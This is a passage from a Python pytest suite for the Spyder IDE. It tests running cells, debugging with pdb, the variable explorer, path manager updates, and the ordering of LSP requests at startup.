    """Test the runcell command."""
    # Write code with a cell to a file
    code = u"result = 10; fname = __file__"
    p = tmpdir.join("cell-test.py")
    p.write(code)
    main_window.editor.load(to_text_string(p))
    shell = main_window.ipyconsole.get_current_shellwidget()
    qtbot.waitUntil(lambda: shell._prompt_html is not None,
                    timeout=SHELL_TIMEOUT)

    if debug:
        function = 'debugcell'
    else:
        function = 'runcell'
    # Execute runcell
    with qtbot.waitSignal(shell.executed):
        shell.execute(function + u"(0, r'{}')".format(to_text_string(p)))

    if debug:
        # Reach the 'name' input
        shell.pdb_execute('!c')
    qtbot.wait(1000)

    # Verify that the `result` variable is defined
    assert shell.get_value('result') == 10

    # Verify that the `fname` variable is `cell-test.py`
    assert "cell-test.py" in shell.get_value('fname')

    # Verify that the `__file__` variable is undefined.
    # (Idiomatic replacement for the old try/``assert False``/except block.)
    with pytest.raises(KeyError):
        shell.get_value('__file__')
@pytest.mark.slow
@flaky(max_runs=3)
def test_runcell_leading_indent(main_window, qtbot, tmpdir):
    """Test the runcell command with leading indent."""
    # Write code with a cell to a file; the cell body is indented because
    # it lives inside the ``if __name__`` block.
    code = ("def a():\n    return\nif __name__ == '__main__':\n"
            "# %%\n    print(1233 + 1)\n")
    p = tmpdir.join("cell-test.py")
    p.write(code)
    main_window.editor.load(to_text_string(p))
    shell = main_window.ipyconsole.get_current_shellwidget()
    qtbot.waitUntil(lambda: shell._prompt_html is not None,
                    timeout=SHELL_TIMEOUT)

    # Execute runcell on the second (indented) cell.
    with qtbot.waitSignal(shell.executed):
        shell.execute("runcell(1, r'{}')".format(to_text_string(p)))

    assert "1234" in shell._control.toPlainText()
    assert "This is not valid Python code" not in shell._control.toPlainText()
@pytest.mark.slow
@flaky(max_runs=3)
def test_varexp_rename(main_window, qtbot, tmpdir):
    """
    Test renaming a variable.

    Regression test for spyder-ide/spyder#10735
    """
    # ---- Setup ----
    p = (tmpdir.mkdir(u"varexp_rename").join(u"script.py"))
    filepath = to_text_string(p)
    shutil.copyfile(osp.join(LOCATION, 'script.py'), filepath)

    # Wait until the window is fully up
    shell = main_window.ipyconsole.get_current_shellwidget()
    qtbot.waitUntil(lambda: shell._prompt_html is not None,
                    timeout=SHELL_TIMEOUT)

    # Load test file
    main_window.editor.load(filepath)

    # Move to the editor's first line
    code_editor = main_window.editor.get_focus_widget()
    code_editor.setFocus()
    qtbot.keyClick(code_editor, Qt.Key_Home, modifier=Qt.ControlModifier)

    # Get a reference to the namespace browser widget
    nsb = main_window.variableexplorer.current_widget()

    # ---- Run file ----
    with qtbot.waitSignal(shell.executed):
        qtbot.keyClick(code_editor, Qt.Key_F5)

    # Wait until all objects have appeared in the variable explorer
    # (script.py defines 4 variables: a, arr, li, s).
    qtbot.waitUntil(lambda: nsb.editor.model.rowCount() == 4,
                    timeout=EVAL_TIMEOUT)

    # Rename the second element ('arr') to 'arr2'
    nsb.editor.setCurrentIndex(nsb.editor.model.index(1, 0))
    nsb.editor.rename_item(new_name='arr2')

    # Wait until all objects have updated in the variable explorer
    def data(cm, i, j):
        # Convenience accessor for a model cell's display data.
        return cm.data(cm.index(i, j))
    qtbot.waitUntil(lambda: data(nsb.editor.model, 1, 0) == 'arr2',
                    timeout=EVAL_TIMEOUT)

    assert data(nsb.editor.model, 0, 0) == 'a'
    assert data(nsb.editor.model, 1, 0) == 'arr2'
    assert data(nsb.editor.model, 2, 0) == 'li'
    assert data(nsb.editor.model, 3, 0) == 's'

    # ---- Run file again ----
    # Re-running recreates 'arr'; 'arr2' must survive alongside it.
    with qtbot.waitSignal(shell.executed):
        qtbot.keyClick(code_editor, Qt.Key_F5)

    # Wait until all objects have appeared in the variable explorer
    qtbot.waitUntil(lambda: nsb.editor.model.rowCount() == 5,
                    timeout=EVAL_TIMEOUT)

    assert data(nsb.editor.model, 0, 0) == 'a'
    assert data(nsb.editor.model, 1, 0) == 'arr'
    assert data(nsb.editor.model, 2, 0) == 'arr2'
    assert data(nsb.editor.model, 3, 0) == 'li'
    assert data(nsb.editor.model, 4, 0) == 's'
@pytest.mark.slow
@flaky(max_runs=3)
def test_varexp_remove(main_window, qtbot, tmpdir):
    """
    Test removing a variable.

    Regression test for spyder-ide/spyder#10709
    """
    # ---- Setup ----
    p = (tmpdir.mkdir(u"varexp_remove").join(u"script.py"))
    filepath = to_text_string(p)
    shutil.copyfile(osp.join(LOCATION, 'script.py'), filepath)

    # Wait until the window is fully up
    shell = main_window.ipyconsole.get_current_shellwidget()
    qtbot.waitUntil(lambda: shell._prompt_html is not None,
                    timeout=SHELL_TIMEOUT)

    # Load test file
    main_window.editor.load(filepath)

    # Move to the editor's first line
    code_editor = main_window.editor.get_focus_widget()
    code_editor.setFocus()
    qtbot.keyClick(code_editor, Qt.Key_Home, modifier=Qt.ControlModifier)

    # Get a reference to the namespace browser widget
    nsb = main_window.variableexplorer.current_widget()

    # ---- Run file ----
    with qtbot.waitSignal(shell.executed):
        qtbot.keyClick(code_editor, Qt.Key_F5)

    # Wait until all objects have appeared in the variable explorer
    # (script.py defines 4 variables: a, arr, li, s).
    qtbot.waitUntil(lambda: nsb.editor.model.rowCount() == 4,
                    timeout=EVAL_TIMEOUT)

    # Remove the second element ('arr')
    nsb.editor.setCurrentIndex(nsb.editor.model.index(1, 0))
    nsb.editor.remove_item(force=True)

    # Wait until all objects have appeared in the variable explorer
    qtbot.waitUntil(lambda: nsb.editor.model.rowCount() == 3,
                    timeout=EVAL_TIMEOUT)

    def data(cm, i, j):
        # Accessor that also re-checks the row count has stayed at 3.
        assert cm.rowCount() == 3
        return cm.data(cm.index(i, j))
    assert data(nsb.editor.model, 0, 0) == 'a'
    assert data(nsb.editor.model, 1, 0) == 'li'
    assert data(nsb.editor.model, 2, 0) == 's'
@pytest.mark.slow
@flaky(max_runs=3)
def test_varexp_refresh(main_window, qtbot):
    """
    Test refreshing the variable explorer while the kernel is executing.
    """
    # Create object
    shell = main_window.ipyconsole.get_current_shellwidget()
    control = main_window.ipyconsole.get_widget().get_focus_widget()
    qtbot.waitUntil(lambda: shell._prompt_html is not None,
                    timeout=SHELL_TIMEOUT)

    # Start a ~1s loop in the kernel that updates `i` ten times.
    shell.execute("import time\n"
                  "for i in range(10):\n"
                  "    print('i = {}'.format(i))\n"
                  "    time.sleep(.1)\n")

    qtbot.waitUntil(lambda: "i = 0" in control.toPlainText())
    qtbot.wait(300)
    # Get value object
    nsb = main_window.variableexplorer.current_widget()

    # The table is not auto-updated while code is running.
    assert len(nsb.editor.source_model._data) == 0
    # Explicitly refreshing must populate it mid-execution.
    nsb.refresh_table()
    qtbot.waitUntil(lambda: len(nsb.editor.source_model._data) == 1)

    # `i` was captured mid-loop, so its value is strictly between 0 and 9.
    assert 0 < int(nsb.editor.source_model._data['i']['view']) < 9
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(sys.platform == 'darwin', reason="Fails on macOS")
def test_runcell_edge_cases(main_window, qtbot, tmpdir):
    """
    Test if runcell works with an unnamed cell at the top of the file
    and with an empty cell.
    """
    # Write code with a cell to a file: an unnamed cell followed by an
    # empty one after the '#%%' marker.
    code = ('if True:\n'
            '    a = 1\n'
            '#%%')
    p = tmpdir.join("test.py")
    p.write(code)
    main_window.editor.load(to_text_string(p))
    shell = main_window.ipyconsole.get_current_shellwidget()
    qtbot.waitUntil(lambda: shell._prompt_html is not None,
                    timeout=SHELL_TIMEOUT)
    code_editor = main_window.editor.get_focus_widget()

    # Run the first (unnamed) cell via Shift+Return.
    with qtbot.waitSignal(shell.executed):
        qtbot.keyClick(code_editor, Qt.Key_Return, modifier=Qt.ShiftModifier)
    qtbot.wait(1000)
    assert 'runcell(0' in shell._control.toPlainText()
    assert 'cell is empty' not in shell._control.toPlainText()

    # Run the second (empty) cell; it must warn but not error out.
    with qtbot.waitSignal(shell.executed):
        qtbot.keyClick(code_editor, Qt.Key_Return, modifier=Qt.ShiftModifier)
    assert 'runcell(1' in shell._control.toPlainText()
    assert 'Error' not in shell._control.toPlainText()
    assert 'cell is empty' in shell._control.toPlainText()
@pytest.mark.slow
@flaky(max_runs=3)
def test_runcell_pdb(main_window, qtbot):
    """Test the runcell command in pdb."""
    # Write code with a cell to a file.  On first execution it defines and
    # calls foo(); on re-execution inside pdb, `abba` (a debugger-frame
    # local) is visible and gets printed.
    code = ("if 'abba' in dir():\n"
            "    print('abba {}'.format(abba))\n"
            "else:\n"
            "    def foo():\n"
            "        abba = 27\n"
            "    foo()\n")
    # Wait until the window is fully up
    shell = main_window.ipyconsole.get_current_shellwidget()
    qtbot.waitUntil(lambda: shell._prompt_html is not None,
                    timeout=SHELL_TIMEOUT)

    # Main variables
    debug_action = main_window.debug_toolbar_actions[0]
    debug_button = main_window.debug_toolbar.widgetForAction(debug_action)

    # Clear all breakpoints
    main_window.editor.clear_all_breakpoints()

    # create new file
    main_window.editor.new()
    code_editor = main_window.editor.get_focus_widget()
    code_editor.set_text(code)

    # Start debugging
    with qtbot.waitSignal(shell.executed, timeout=10000):
        qtbot.mouseClick(debug_button, Qt.LeftButton)

    # Step into foo() so the frame where ``abba`` is assigned is current.
    for key in ['!n', '!n', '!s', '!n', '!n']:
        with qtbot.waitSignal(shell.executed):
            qtbot.keyClicks(shell._control, key)
            qtbot.keyClick(shell._control, Qt.Key_Enter)

    assert shell.get_value('abba') == 27

    code_editor.setFocus()
    # call runcell from inside the pdb session
    with qtbot.waitSignal(shell.executed):
        qtbot.keyClick(code_editor, Qt.Key_Return, modifier=Qt.ShiftModifier)
    assert "runcell" in shell._control.toPlainText()

    # Make sure the local variables are detected
    assert "abba 27" in shell._control.toPlainText()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.parametrize(
    "debug", [False, True])
def test_runcell_cache(main_window, qtbot, debug):
    """Test the runcell command cache."""
    # Write code with a cell to a file
    # The first cell sleeps so the second runcell request arrives while the
    # kernel is still busy; it must be cached and executed afterwards.
    code = ("import time\n"
            "time.sleep(.5)\n"
            "# %%\n"
            "print('Done')\n")
    # Wait until the window is fully up
    shell = main_window.ipyconsole.get_current_shellwidget()
    qtbot.waitUntil(lambda: shell._prompt_html is not None,
                    timeout=SHELL_TIMEOUT)
    # create new file
    main_window.editor.new()
    code_editor = main_window.editor.get_focus_widget()
    code_editor.set_text(code)
    if debug:
        # Start debugging
        with qtbot.waitSignal(shell.executed):
            shell.execute("%debug print()")
    # Run the two cells
    code_editor.setFocus()
    code_editor.move_cursor(0)
    qtbot.keyClick(code_editor, Qt.Key_Return, modifier=Qt.ShiftModifier)
    qtbot.wait(100)
    qtbot.keyClick(code_editor, Qt.Key_Return, modifier=Qt.ShiftModifier)
    qtbot.wait(500)
    # The second (cached) cell eventually runs and prints 'Done'.
    qtbot.waitUntil(lambda: "Done" in shell._control.toPlainText())
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(not sys.platform.startswith('linux'),
                    reason="Works reliably on Linux")
def test_path_manager_updates_clients(qtbot, main_window, tmpdir):
    """Check that on path manager updates, consoles correctly update."""
    main_window.show_path_manager()
    dlg = main_window._path_manager
    test_folder = 'foo-spam-bar-123'
    folder = str(tmpdir.mkdir(test_folder))
    dlg.add_path(folder)
    qtbot.waitUntil(lambda: dlg.button_ok.isEnabled(), timeout=EVAL_TIMEOUT)
    # Accepting the dialog broadcasts the new path to all clients.
    with qtbot.waitSignal(dlg.sig_path_changed, timeout=EVAL_TIMEOUT):
        dlg.button_ok.animateClick()
    cmd = 'import sys;print(sys.path)'
    # Check Spyder is updated
    main_window.console.execute_lines(cmd)
    syspath = main_window.console.get_sys_path()
    assert folder in syspath
    # Check clients are updated
    count = 0
    for client in main_window.ipyconsole.get_clients():
        shell = client.shellwidget
        if shell is not None:
            syspath = shell.execute(cmd)
            control = shell._control
            # `shell.executed` signal was not working so we use waitUntil
            qtbot.waitUntil(lambda: 'In [2]:' in control.toPlainText(),
                            timeout=10000)
            # The printed sys.path must contain the newly added folder.
            assert test_folder in control.toPlainText()
            count += 1
    # At least one console client must have been checked.
    assert count >= 1
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(os.name == 'nt' or sys.platform == 'darwin',
                    reason="It times out on macOS and Windows")
def test_pdb_key_leak(main_window, qtbot, tmpdir):
    """
    Check that pdb notifying Spyder doesn't call
    QApplication.processEvents(). If it does there might be keystroke
    leakage. See #10834.
    """
    # Wait until the window is fully up
    shell = main_window.ipyconsole.get_current_shellwidget()
    qtbot.waitUntil(lambda: shell._prompt_html is not None,
                    timeout=SHELL_TIMEOUT)
    control = shell._control

    # Write two files: tmp.py raises and tmp2.py imports and calls it.
    code1 = ("def a():\n"
             "    1/0")
    code2 = ("from tmp import a\n"
             "a()")
    folder = tmpdir.join('tmp_folder')
    test_file = folder.join('tmp.py')
    test_file.write(code1, ensure=True)
    test_file2 = folder.join('tmp2.py')
    test_file2.write(code2)

    # Run tmp2 and get an error
    with qtbot.waitSignal(shell.executed):
        shell.execute('runfile("' + str(test_file2).replace("\\", "/") +
                      '", wdir="' + str(folder).replace("\\", "/") + '")')
    assert '1/0' in control.toPlainText()

    # Replace QApplication.processEvents to make sure it is not called
    super_processEvents = QApplication.processEvents

    def processEvents():
        processEvents.called = True
        return super_processEvents()

    processEvents.called = False
    try:
        QApplication.processEvents = processEvents
        # Debug and open both files
        with qtbot.waitSignal(shell.executed):
            shell.execute('%debug')
        with qtbot.waitSignal(shell.executed):
            qtbot.keyClicks(control, '!u')
            qtbot.keyClick(control, Qt.Key_Enter)
        # Wait until both files are open.
        # Fix: normalize BOTH sides of each comparison; the original left
        # str(test_file2) unnormalized, so it could never match the
        # normalized editor paths on platforms with differing separators.
        qtbot.waitUntil(
            lambda: osp.normpath(str(test_file)) in [
                osp.normpath(p) for p in main_window.editor.get_filenames()])
        qtbot.waitUntil(
            lambda: osp.normpath(str(test_file2)) in [
                osp.normpath(p) for p in main_window.editor.get_filenames()])
        # Make sure the events are not processed.
        assert not processEvents.called
    finally:
        # Always restore the real processEvents, even if the test failed.
        QApplication.processEvents = super_processEvents
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(sys.platform == 'darwin', reason="It times out on macOS")
@pytest.mark.parametrize(
    "where", [True, False])
def test_pdb_step(main_window, qtbot, tmpdir, where):
    """
    Check that pdb notify Spyder only moves when a new line is reached.
    """
    # Wait until the window is fully up
    shell = main_window.ipyconsole.get_current_shellwidget()
    qtbot.waitUntil(lambda: shell._prompt_html is not None,
                    timeout=SHELL_TIMEOUT)
    control = shell._control

    # Write code to a file: tmp.py raises, tmp2.py imports and calls it.
    code1 = ("def a():\n"
             "    1/0")
    code2 = ("from tmp import a\n"
             "a()")
    folder = tmpdir.join('tmp_folder')
    test_file = folder.join('tmp.py')
    test_file.write(code1, ensure=True)
    test_file2 = folder.join('tmp2.py')
    test_file2.write(code2)

    # Run tmp2 and get an error
    with qtbot.waitSignal(shell.executed):
        shell.execute('runfile("' + str(test_file2).replace("\\", "/") +
                      '", wdir="' + str(folder).replace("\\", "/") + '")')
    qtbot.wait(1000)
    assert '1/0' in control.toPlainText()

    # Debug and enter first file
    with qtbot.waitSignal(shell.executed):
        shell.execute('%debug')
    qtbot.waitUntil(
        lambda: osp.samefile(
            main_window.editor.get_current_editor().filename,
            str(test_file)))

    # Move to another file
    main_window.editor.new()
    qtbot.wait(100)
    assert main_window.editor.get_current_editor().filename != str(test_file)
    current_filename = main_window.editor.get_current_editor().filename

    # Run a random command, make sure we don't move
    # (the debugger didn't reach a new line, so the editor must not jump)
    with qtbot.waitSignal(shell.executed):
        qtbot.keyClicks(control, '!a')
        qtbot.keyClick(control, Qt.Key_Enter)
    qtbot.wait(1000)
    assert current_filename == main_window.editor.get_current_editor().filename

    # Go up and enter second file
    with qtbot.waitSignal(shell.executed):
        qtbot.keyClicks(control, '!u')
        qtbot.keyClick(control, Qt.Key_Enter)
    qtbot.waitUntil(
        lambda: osp.samefile(
            main_window.editor.get_current_editor().filename,
            str(test_file2)))

    # Go back to first file
    editor_stack = main_window.editor.get_current_editorstack()
    index = editor_stack.has_filename(str(test_file))
    assert index is not None
    editor_stack.set_stack_index(index)
    assert osp.samefile(
        main_window.editor.get_current_editor().filename,
        str(test_file))

    if where:
        # go back to the second file with where
        with qtbot.waitSignal(shell.executed):
            qtbot.keyClicks(control, '!w')
            qtbot.keyClick(control, Qt.Key_Enter)
        qtbot.wait(1000)

        # Make sure we moved
        assert osp.samefile(
            main_window.editor.get_current_editor().filename,
            str(test_file2))
    else:
        # Stay at the same place
        with qtbot.waitSignal(shell.executed):
            qtbot.keyClicks(control, '!a')
            qtbot.keyClick(control, Qt.Key_Enter)
        qtbot.wait(1000)

        # Make sure we didn't move
        assert osp.samefile(
            main_window.editor.get_current_editor().filename,
            str(test_file))
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(sys.platform == 'darwin',
                    reason="Fails sometimes on macOS")
def test_runcell_after_restart(main_window, qtbot):
    """Test runcell after a kernel restart."""
    # Write code to a file
    code = "print('test_runcell_after_restart')"
    # Wait until the window is fully up
    shell = main_window.ipyconsole.get_current_shellwidget()
    qtbot.waitUntil(lambda: shell._prompt_html is not None,
                    timeout=SHELL_TIMEOUT)
    # create new file
    main_window.editor.new()
    code_editor = main_window.editor.get_focus_widget()
    code_editor.set_text(code)
    # Restart Kernel
    with qtbot.waitSignal(shell.sig_prompt_ready, timeout=10000):
        shell.ipyclient.restart_kernel()
    # call runcell
    # Running a cell right after the restart checks that the runcell
    # machinery works against the freshly started kernel.
    code_editor.setFocus()
    qtbot.keyClick(code_editor, Qt.Key_Return, modifier=Qt.ShiftModifier)
    qtbot.waitUntil(
        lambda: "test_runcell_after_restart" in shell._control.toPlainText())
    # Make sure no errors are shown
    assert "error" not in shell._control.toPlainText().lower()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(sys.platform.startswith('linux'),
                    reason="It fails sometimes on Linux")
@pytest.mark.parametrize(
    "ipython", [True, False])
@pytest.mark.parametrize(
    "test_cell_magic", [True, False])
def test_ipython_magic(main_window, qtbot, tmpdir, ipython, test_cell_magic):
    """Test the runcell command with cell magic."""
    # Write code with a cell to a file
    write_file = tmpdir.mkdir("foo").join("bar.txt")
    assert not osp.exists(to_text_string(write_file))
    if test_cell_magic:
        code = "\n\n%%writefile " + to_text_string(write_file) + "\ntest\n"
    else:
        code = "\n\n%debug print()"
    # Magics are only allowed in .ipy files; for .py files an error asking
    # the user to rename the file must be shown instead.
    if ipython:
        fn = "cell-test.ipy"
    else:
        fn = "cell-test.py"
    p = tmpdir.join(fn)
    p.write(code)
    main_window.editor.load(to_text_string(p))
    shell = main_window.ipyconsole.get_current_shellwidget()
    qtbot.waitUntil(lambda: shell._prompt_html is not None,
                    timeout=SHELL_TIMEOUT)

    # Execute runcell
    with qtbot.waitSignal(shell.executed):
        shell.execute("runcell(0, r'{}')".format(to_text_string(p)))
    control = main_window.ipyconsole.get_widget().get_focus_widget()

    error_text = 'save this file with the .ipy extension'
    try:
        if ipython:
            if test_cell_magic:
                qtbot.waitUntil(
                    lambda: 'Writing' in control.toPlainText())
                # Verify that the code was executed
                assert osp.exists(to_text_string(write_file))
            else:
                # Fix: the original called qtbot.waitSignal(shell.executed)
                # without entering the context manager, which does not wait
                # at all. Give the console time to print any output instead.
                qtbot.wait(1000)
            assert error_text not in control.toPlainText()
        else:
            qtbot.waitUntil(lambda: error_text in control.toPlainText())
    finally:
        # Remove the file written by %%writefile so reruns start clean.
        if osp.exists(to_text_string(write_file)):
            os.remove(to_text_string(write_file))
@pytest.mark.slow
@flaky(max_runs=3)
def test_running_namespace(main_window, qtbot, tmpdir):
    """
    Test that the running namespace is correctly sent when debugging in a
    new namespace.
    """
    code = ("def test(a):\n    print('a:',a)\na = 10\ntest(5)")

    # Wait until the window is fully up
    shell = main_window.ipyconsole.get_current_shellwidget()
    qtbot.waitUntil(lambda: shell._prompt_html is not None,
                    timeout=SHELL_TIMEOUT)

    # Main variables
    debug_action = main_window.debug_toolbar_actions[0]
    debug_button = main_window.debug_toolbar.widgetForAction(debug_action)

    # Clear all breakpoints
    main_window.editor.clear_all_breakpoints()

    # create new file
    main_window.editor.new()
    code_editor = main_window.editor.get_focus_widget()
    code_editor.set_text(code)
    # Break inside test(), where only its local namespace should be shown.
    code_editor.debugger.toogle_breakpoint(line_number=2)

    # Write b in the namespace
    with qtbot.waitSignal(shell.executed):
        shell.execute('b = 10')
    nsb = main_window.variableexplorer.current_widget()
    qtbot.waitUntil(lambda: 'b' in nsb.editor.source_model._data)
    assert nsb.editor.source_model._data['b']['view'] == '10'

    # Start debugging
    with qtbot.waitSignal(shell.executed):
        qtbot.mouseClick(debug_button, Qt.LeftButton)

    # b should not be there (running namespace) and the local a should be 5
    qtbot.waitUntil(lambda: 'a' in nsb.editor.source_model._data and
                    nsb.editor.source_model._data['a']['view'] == '5',
                    timeout=3000)
    assert 'b' not in nsb.editor.source_model._data
    assert nsb.editor.source_model._data['a']['view'] == '5'
    qtbot.waitUntil(shell.is_waiting_pdb_input)
    # Continue to the end of the script.
    with qtbot.waitSignal(shell.executed):
        shell.pdb_execute('!c')

    # At the end, b should be back and a should be 10
    qtbot.waitUntil(lambda: 'b' in nsb.editor.source_model._data)
    assert nsb.editor.source_model._data['a']['view'] == '10'
    assert nsb.editor.source_model._data['b']['view'] == '10'
@pytest.mark.slow
@flaky(max_runs=3)
def test_post_mortem(main_window, qtbot, tmpdir):
    """Test post mortem works"""
    # Wait for the console to be ready.
    shellwidget = main_window.ipyconsole.get_current_shellwidget()
    qtbot.waitUntil(
        lambda: shellwidget._prompt_html is not None, timeout=SHELL_TIMEOUT)
    console_control = main_window.ipyconsole.get_widget().get_focus_widget()

    # A script whose only statement raises.
    crashing_script = tmpdir.join('test.py')
    crashing_script.write('raise RuntimeError\n')

    # Run it with post_mortem enabled and wait for execution to finish.
    command = (
        "runfile(" + repr(str(crashing_script)) + ", post_mortem=True)")
    with qtbot.waitSignal(shellwidget.executed):
        shellwidget.execute(command)

    # The console must have dropped into the post-mortem debugger.
    assert "IPdb [" in console_control.toPlainText()
@pytest.mark.slow
@flaky(max_runs=3)
def test_run_unsaved_file_multiprocessing(main_window, qtbot):
    """Test that we can run an unsaved file with multiprocessing."""
    # Wait until the window is fully up
    shell = main_window.ipyconsole.get_current_shellwidget()
    qtbot.waitUntil(lambda: shell._prompt_html is not None,
                    timeout=SHELL_TIMEOUT)

    # Main variables
    run_action = main_window.run_toolbar_actions[0]
    run_button = main_window.run_toolbar.widgetForAction(run_action)

    # create new file
    main_window.editor.new()
    code_editor = main_window.editor.get_focus_widget()
    # Fix: the generated code used `if __name__ is "__main__":` — identity
    # comparison with a string literal is a SyntaxWarning and only works by
    # accident of interning; `==` is the correct comparison.
    code_editor.set_text(
        "import multiprocessing\n"
        "import traceback\n"
        'if __name__ == "__main__":\n'
        "    p = multiprocessing.Process(target=traceback.print_exc)\n"
        "    p.start()\n"
        "    p.join()\n"
    )
    # This code should run even on windows

    # Start running
    qtbot.mouseClick(run_button, Qt.LeftButton)

    # Because multiprocessing is behaving strangly on windows, only some
    # situations will work. This is one of these situations so it shouldn't
    # be broken.
    if os.name == 'nt':
        qtbot.waitUntil(
            lambda: "Warning: multiprocessing" in shell._control.toPlainText())
    else:
        # There is no exception, so the exception is None
        qtbot.waitUntil(
            lambda: 'None' in shell._control.toPlainText())
@pytest.mark.slow
@flaky(max_runs=3)
def test_varexp_cleared_after_kernel_restart(main_window, qtbot):
    """
    Test that the variable explorer is cleared after a kernel restart.
    """
    shellwidget = main_window.ipyconsole.get_current_shellwidget()
    qtbot.waitUntil(
        lambda: shellwidget._prompt_html is not None, timeout=SHELL_TIMEOUT)

    # Define a variable in the kernel namespace.
    with qtbot.waitSignal(shellwidget.executed):
        shellwidget.execute('a = 10')

    # The variable explorer must pick it up.
    namespace_browser = main_window.variableexplorer.current_widget()
    qtbot.waitUntil(
        lambda: 'a' in namespace_browser.editor.source_model._data,
        timeout=3000)

    # Restart the kernel and wait for the new prompt.
    with qtbot.waitSignal(shellwidget.sig_prompt_ready, timeout=10000):
        shellwidget.ipyclient.restart_kernel()

    # After the restart the variable must be gone.
    qtbot.waitUntil(
        lambda: 'a' not in namespace_browser.editor.source_model._data,
        timeout=3000)
@pytest.mark.slow
@flaky(max_runs=3)
def test_varexp_cleared_after_reset(main_window, qtbot):
    """
    Test that the variable explorer is cleared after triggering a
    reset in the IPython console and variable explorer panes.
    """
    shellwidget = main_window.ipyconsole.get_current_shellwidget()
    qtbot.waitUntil(
        lambda: shellwidget._prompt_html is not None, timeout=SHELL_TIMEOUT)

    def create_variable():
        # Define `a` in the kernel and wait until the variable explorer
        # displays it; return the namespace browser for later checks.
        with qtbot.waitSignal(shellwidget.executed):
            shellwidget.execute('a = 10')
        browser = main_window.variableexplorer.current_widget()
        qtbot.waitUntil(
            lambda: 'a' in browser.editor.source_model._data, timeout=3000)
        return browser

    # Reset triggered from the variable explorer pane.
    namespace_browser = create_variable()
    namespace_browser.reset_namespace()
    qtbot.waitUntil(
        lambda: 'a' not in namespace_browser.editor.source_model._data,
        timeout=3000)

    # Reset triggered from the IPython console pane.
    namespace_browser = create_variable()
    shellwidget.ipyclient.reset_namespace()
    qtbot.waitUntil(
        lambda: 'a' not in namespace_browser.editor.source_model._data,
        timeout=3000)
@pytest.mark.slow
@flaky(max_runs=3)
def test_immediate_debug(main_window, qtbot):
    """
    Check if we can enter debugging immediately
    """
    shellwidget = main_window.ipyconsole.get_current_shellwidget()
    # Deliberately do not wait for the prompt: entering the debugger right
    # after the console is created must still work.
    with qtbot.waitSignal(shellwidget.executed, timeout=SHELL_TIMEOUT):
        shellwidget.execute("%debug print()")
@pytest.mark.slow
@flaky(max_runs=3)
def test_local_namespace(main_window, qtbot, tmpdir):
    """
    Test that the local namespace is not reset.

    This can happen if `frame.f_locals` is called on the current frame, as this
    has the side effect of discarding the pdb locals.
    """
    code = ("""
def hello():
    test = 1
    print('test ==', test)
hello()
""")

    # Wait until the window is fully up
    shell = main_window.ipyconsole.get_current_shellwidget()
    qtbot.waitUntil(lambda: shell._prompt_html is not None,
                    timeout=SHELL_TIMEOUT)

    # Main variables
    debug_action = main_window.debug_toolbar_actions[0]
    debug_button = main_window.debug_toolbar.widgetForAction(debug_action)

    # Clear all breakpoints
    main_window.editor.clear_all_breakpoints()

    # create new file
    main_window.editor.new()
    code_editor = main_window.editor.get_focus_widget()
    code_editor.set_text(code)
    # Stop inside hello(), on the print line.
    code_editor.debugger.toogle_breakpoint(line_number=4)

    nsb = main_window.variableexplorer.current_widget()

    # Start debugging
    with qtbot.waitSignal(shell.executed):
        qtbot.mouseClick(debug_button, Qt.LeftButton)

    # Check `test` has a value of 1
    # Here we use "waitUntil" because `shell.executed` is emitted twice
    # One at the beginning of the file, and once at the breakpoint
    qtbot.waitUntil(lambda: 'test' in nsb.editor.source_model._data and
                    nsb.editor.source_model._data['test']['view'] == '1',
                    timeout=3000)

    # change value of test
    with qtbot.waitSignal(shell.executed):
        shell.execute("test = 1 + 1")

    # check value of test
    with qtbot.waitSignal(shell.executed):
        shell.execute("print('test =', test)")
    assert "test = 2" in shell._control.toPlainText()

    # change value of test
    with qtbot.waitSignal(shell.executed):
        shell.execute("test = 1 + 1 + 1")

    # do next
    # After `!next`, the script's print must see the pdb-assigned value,
    # which proves the local namespace was not reset.
    with qtbot.waitSignal(shell.executed):
        shell.pdb_execute("!next")
    assert "test == 3" in shell._control.toPlainText()

    # Check the namespace browser is updated
    assert ('test' in nsb.editor.source_model._data and
            nsb.editor.source_model._data['test']['view'] == '3')
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.use_introspection
@pytest.mark.preload_project
@pytest.mark.skipif(os.name == 'nt', reason='Times out on Windows')
def test_ordering_lsp_requests_at_startup(main_window, qtbot):
    """
    Test the ordering of requests we send to the LSP at startup when a
    project was left open during the previous session.

    This is a regression test for spyder-ide/spyder#13351.
    """
    # Wait until the LSP server is up.
    code_editor = main_window.editor.get_current_editor()
    # NOTE(review): qtbot.waitSignal is not entered as a context manager
    # here, so this line does not actually block; the qtbot.wait(5000)
    # below is what gives the server time to respond — confirm intent.
    qtbot.waitSignal(code_editor.completions_response_signal, timeout=30000)

    # Wait until the initial requests are sent to the server.
    lsp = main_window.completions.get_provider('lsp')
    python_client = lsp.clients['python']
    qtbot.wait(5000)

    # The requests must appear in exactly this relative order.
    expected_requests = [
        'initialize',
        'initialized',
        'workspace/didChangeConfiguration',
        'workspace/didChangeWorkspaceFolders',
        'textDocument/didOpen',
    ]

    # Requests that may legitimately appear before the expected one we are
    # currently waiting for (keyed by that expected request).
    skip_intermediate = {
        'initialized': {'workspace/didChangeConfiguration'}
    }

    lsp_requests = python_client['instance']._requests
    start_idx = lsp_requests.index((0, 'initialize'))

    # Walk the recorded requests from 'initialize' on, matching each
    # expected request in turn while tolerating allowed intermediates.
    request_order = []
    expected_iter = iter(expected_requests)
    current_expected = next(expected_iter)
    for i in range(start_idx, len(lsp_requests)):
        if current_expected is None:
            break
        _, req_type = lsp_requests[i]
        if req_type == current_expected:
            request_order.append(req_type)
            current_expected = next(expected_iter, None)
        else:
            skip_set = skip_intermediate.get(current_expected, set({}))
            if req_type in skip_set:
                continue
            else:
                # An unexpected request arrived out of order: fail here
                # with a message showing both request types.
                assert req_type == current_expected

    assert request_order == expected_requests
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.parametrize(
    'main_window',
    [{'spy_config': ('tours', 'show_tour_message', 2)}],
    indirect=True)
def test_tour_message(main_window, qtbot):
    """Test that the tour message displays and sends users to the tour."""
    # Wait until window setup is finished, which is when the message appears
    tours = main_window.get_plugin(Plugins.Tours)
